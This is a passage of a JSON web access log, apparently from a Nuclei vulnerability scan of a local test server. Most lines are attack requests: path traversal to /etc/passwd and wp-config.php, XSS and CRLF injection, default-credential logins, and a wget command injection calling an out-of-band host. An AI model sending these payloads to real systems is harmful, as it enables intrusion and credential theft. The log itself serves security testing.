"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"fldr=&url=file:///etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /filemanager/upload.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event3=352513&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect-to?url=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ibmmq/console/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"submitId=debug&debugCmd=wget+http://c9v8h8gsmpv8c1qg07h0kugngtss1mq4u.oast.fun&submitEnd=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.htm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /em/console/logon/logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/dashboard?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/agent/self HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/install.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\x22onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"\x0D\x0A pingback.ping\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://c9v8h8gsmpv8c1qg07h0e7epppmhmu77z.oast.fun\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://127.0.0.1/?p=1\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.195","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cpqlogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"wsecure_action=update&publish=\x22;} header(\x22Nuclei: CVE-2016-10960\x22); class WSecureConfig2 {var $test=\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com;@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?destpage=\x22&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"username=admin&password=gophish&csrf_token={{replace(url_encode(html_unescape(csrf_token)), \x22+\x22, \x22%2B\x22)}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/lesson/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/system/deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https%3a%2f%2fexample.com%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/manifests/files/joomla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x22Type\x22:\x22SubscriptionConfirmation\x22,\x22Message\x22:\x22\x22,\x22SubscribeURL\x22:\x22https://rfi.nessus.org/rfi.txt\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x22email\x22:\x22297MU3f1JZlWsK7k9Sd7S3AVTQF@example.com\x22,\x22password\x22:\x22297MU3f1JZlWsK7k9Sd7S3AVTQF\x22,\x22username\x22:\x22297MU3f1JZlWsK7k9Sd7S3AVTQF\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/reg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjec